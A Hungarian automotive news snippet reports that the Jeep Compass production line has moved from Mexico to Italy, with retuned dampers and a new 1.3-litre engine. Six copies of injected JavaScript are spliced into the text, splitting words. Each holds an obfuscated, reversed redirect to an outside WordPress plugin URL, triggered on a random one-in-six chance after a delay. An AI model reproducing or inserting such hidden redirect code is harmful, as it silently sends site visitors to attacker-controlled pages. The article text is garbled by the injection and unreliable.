Mexikóból Olaszországba költöztette a Jeep Compass gyártósorát az FCA csoport. Ez nem csak az európai vevők rugalmasabb, gyorsabb kiszolgálását ígéri, de a modell futóművének áthangolását is jelentette: módosítoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tották a lengéscsillapítókat, így a Compass mostantól csekélyebb oldaldőléssel kanyarodik, stabilabban fékez, pontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosabban vezethető. A Melfi üzemben új motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torral készül az autó: a Renegade-ből átemelt, 1,3 literes benzinmotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor 130 vagy 150 lóerős lehet. Előbbihez kézi, utóbbihoz száraz duplakuplungos váltó csatlakozik, és mindkét esetben az első kerekek hajtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tottak. Autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomata váltóval eddig csak összkerékhajtású Compass volt elérhető, az új fejlesztés megfizethetőbbé teszi a modellt, arról nem is beszélve, hogy az új hajtáslánc 30%-kal takarékosabb, mint…
- Hirdetés -